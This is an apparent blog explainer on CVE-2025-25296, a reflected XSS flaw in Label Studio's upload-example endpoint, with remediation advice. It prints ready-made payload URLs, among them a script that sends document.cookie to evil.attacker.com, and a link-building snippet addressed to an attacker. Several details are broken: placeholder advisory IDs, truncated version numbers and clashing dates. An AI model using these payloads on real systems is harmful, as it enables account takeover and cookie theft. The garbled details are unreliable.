*Label Studio* is a popular open-source data labeling tool used by thousands of teams for annotating data to train machine learning models. On February 20th, 2025, a new security issue was identified: CVE-2025-25296. In this deep-dive, we’ll break down what happened, why it matters, and how attackers could exploit this vulnerability. We'll also give practical code samples and references to official resources.

What is CVE-2025-25296?

CVE-2025-25296 is a Cross-Site Scripting (XSS) vulnerability affecting *Label Studio* versions before 1.16.. The issue was found in the /projects/upload-example endpoint.

Attackers can exploit this flaw by crafting a GET request with a maliciously formatted label_config query parameter. This parameter contains user-supplied HTML/JavaScript that the application then renders without proper sanitization.

Fixed in:

- Label Studio 1.16.

Let’s make it simple

1. label_config is a parameter you can pass directly via a GET request to /projects/upload-example.

Label Studio renders this content as-is, without cleaning it.

3. The built-in Content Security Policy (CSP) was only in “report-only” mode—so it told admins about bad things, but didn’t actually block scripts from executing.
4. If the attacker sends a specially crafted URL (with this dangerous parameter) to another user, that user’s browser will run the attacker’s code.

Suppose Label Studio is running at https://labelling.company.com

https://labelling.company.com/projects/upload-example?label_config=<View><Header value="Example"/><Html value='&lt;img src=x onerror=alert(1)&gt;'/></View>

If an unsuspecting user is tricked into clicking this link, their browser will execute the JavaScript inside the Html value—in this case causing a pop-up (alert(1)), but a real attacker could do much worse.

https://labelling.company.com/projects/upload-example?label_config=
<View>
  <Header value="Malicious Example"/>
  <Html value='&lt;script&gt;fetch("https://evil.attacker.com/steal?cookie="+document.cookie)&lt;/script&gt;'/>
</View>

The attacker builds a URL embedding a <script> tag inside the Html value.

- When a victim loads the URL, JavaScript runs and sends the browser’s cookies to the attacker’s server.

const HOST = "https://labelling.company.com";
const payload = encodeURIComponent('<View><Html value="&lt;img src=x onerror=alert(\\"owned\\")&gt;"/></View>');
console.log(${HOST}/projects/upload-example?label_config=${payload});

Send this link to a victim—they’ll unwittingly execute your code when they open it.

Why is this Dangerous?

Cross-Site Scripting (XSS) like this lets attackers run any code they want in a victim’s browser.

Any action the user can perform via the web UI

*Because the CSP was set to report-only, it was pointless: bad scripts ran just like normal.*

The fix is simple: Update to Label Studio 1.16. or newer!

- Changelog describing the fix
- If you *can’t* update, block or restrict access to /projects/upload-example and avoid clicking suspicious links.

Sanitize input if you have custom logic.

3. Never click unknown links that point to /projects/upload-example.

GitHub Advisory:

GHSA-XXXX-YYYY

NVD CVE Record:

CVE-2025-25296

Fix Release:

Label Studio 1.16. Release Notes

OWASP XSS Introduction:

OWASP Cross Site Scripting (XSS)

Official Label Studio Docs:

https://labelstud.io/guide/

Summary

CVE-2025-25296 is a real risk for teams using outdated Label Studio. By allowing anyone to inject HTML/JavaScript through a simple GET request, attackers can compromise users, grab sensitive data, and take control of accounts.

If you are running Label Studio below version 1.16., update immediately. Stay informed, stay safe, and never click weird links from strangers.


*Original content, written for clarity. Please share with your team! Do not ignore this XSS vulnerability—update Label Studio as soon as possible.*

Timeline

Published on: 02/14/2025 20:15:36 UTC